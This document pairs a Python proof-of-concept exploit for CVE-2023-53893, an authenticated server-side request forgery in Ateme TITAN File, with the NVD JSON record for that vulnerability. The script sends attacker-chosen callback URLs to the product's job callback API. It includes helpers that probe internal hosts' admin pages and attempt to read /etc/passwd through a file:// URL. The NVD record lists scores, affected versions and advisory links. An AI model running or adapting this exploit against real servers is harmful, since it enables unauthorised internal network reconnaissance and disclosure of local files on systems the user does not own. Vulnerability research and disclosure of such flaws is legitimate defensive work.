CVE-2023-53893

import requests import argparse def exploit_ssrf(target_url, callback_url): """ CVE-2023-53893 PoC - Ateme TITAN File SSRF Authenticated SSRF via job callback URL parameter """ # Target endpoint for job callback configuration endpoint = f"{target_url}/api/jobs/callback" # Malicious callback URL to trigger SSRF payload = { "callback_url": callback_url, "job_id": "test_job" } try: response = requests.post(endpoint, json=payload, verify=False, timeout=10) print(f"[*] Request sent to {endpoint}") print(f"[*] Callback URL: {callback_url}") print(f"[*] Response Status: {response.status_code}") return response.text except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return None def ssrf_internal_probe(target_url, internal_host): """ Probe internal network via SSRF """ # Internal host to probe callback_url = f"http://{internal_host}:80/admin" return exploit_ssrf(target_url, callback_url) def ssrf_file_access(target_url): """ Access local files via SSRF using file:// protocol """ # Local file to read callback_url = "file:///etc/passwd" return exploit_ssrf(target_url, callback_url) if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2023-53893 SSRF Exploit") parser.add_argument("--target", required=True, help="Target TITAN File URL") parser.add_argument("--callback", required=True, help="Callback URL to probe") args = parser.parse_args() exploit_ssrf(args.target, args.callback)

{"cve": {"id": "CVE-2023-53893", "sourceIdentifier": "[email protected]", "published": "2025-12-15T21:15:52.683", "lastModified": "2025-12-18T21:36:17.203", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ateme TITAN File 3.9.12.4 contains an authenticated server-side request forgery vulnerability in the job callback URL parameter that allows attackers to bypass network restrictions. Attackers can exploit the unvalidated parameter to initiate file, service, and network enumeration by forcing the application to make HTTP, DNS, or file requests to arbitrary destinations."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ateme:titan_file:3.9.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "6E4B3875-7745-42FE-925A-7D866410CB1E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ateme:titan_file:3.9.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "E2DF94E7-D06E-424E-8804-935CA80EE9C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ateme:titan_file:3.9.11.0:*:*:*:*:*:*:*", "matchCriteriaId": "93FCDBD7-B26D-4FB8-90B3-3CE462B0CD69"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ateme:titan_file:3.9.12.4:*:*:*:*:*:*:*", "matchCriteriaId": "B12949D5-B928-4C32-8B06-BE4AD5633BFE"}]}]}], "references": [{"url": "https://www.ateme.com/product-titan-software/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51582", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/ateme-titan-file-authenticated-server-side-request-forgery-vulnerability", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}